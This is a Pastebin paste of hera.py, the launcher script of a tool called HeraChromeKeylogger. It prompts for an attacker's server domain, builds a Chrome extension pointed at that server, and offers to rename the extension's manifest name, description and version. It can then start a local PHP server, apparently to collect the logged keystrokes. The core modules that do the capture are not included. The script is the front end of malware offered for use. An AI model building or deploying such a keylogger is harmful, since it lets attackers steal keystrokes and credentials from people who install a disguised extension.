Advertisement
FlyFar

hera.py

Nov 19th, 2023
731
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.02 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env python3
  2.  
  3. ######################################################
  4. #                                                    #
  5. #       HeraChromeKeylogger                          #
  6. #                                                    #
  7. # by:     UNDEADSEC                                  #
  8. #                                                    #
  9. # Telegram Group: https://t.me/UndeadSec             #
  10. # YouTube Channel: https://youtube.com/c/UndeadSec   #
  11. # Twitter: https://twitter.com/UndeadSec                #
  12. #                                                    #
  13. ######################################################
  14.  
  15. from sys import exit, version_info
  16.  
  17. if version_info<(3,0,0):
  18.     print('[!] Please use Python 3. $ python3 hera.py')
  19.     exit(0)
  20.  
  21. from core.view import *
  22. from core.pre import *
  23. from core.builder import *
  24.  
  25. if checkPHP() == False:
  26.     phpNot()
  27.     exit(0)
  28.  
  29. def main():
  30.     printQue('Insert your server ip/domain:')
  31.     domain = input(' > ')
  32.     if 'https://' in domain:
  33.         domain = domain.split('https://')[1]
  34.         prefix = 'https://'
  35.     elif 'http://' in domain:
  36.         domain = domain.split('http://')[1]
  37.         prefix = 'http://'
  38.     else:
  39.         prefix = 'http://'
  40.     build(prefix, domain)
  41.     printQue('Edit manifest informations (i.e: name) [y/n] ?')
  42.     editManifest = input(' > ')
  43.     if editManifest.upper() == 'Y':
  44.         printQue('Insert a new name:')
  45.         newName = input(' > ')        
  46.         printQue('Insert a new description:')
  47.         newDesc = input(' > ')  
  48.         printQue('Insert a new version number:')      
  49.         newVersion = input(' > ')
  50.         editMan(newName, newDesc, newVersion)
  51.     done()
  52.     printQue('Start local php server [y/n] ?')
  53.     server = input(' > ')
  54.     if server.upper() == 'Y':
  55.         runServer()
  56.  
  57.  
  58. if __name__ == "__main__":
  59.     try:
  60.         clear()
  61.         checkEd()
  62.         head()
  63.         pre()
  64.         main()                
  65.        
  66.     except KeyboardInterrupt:
  67.         end()
  68.         exit(0)
  69.  
  70.  
  71.  
  72.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement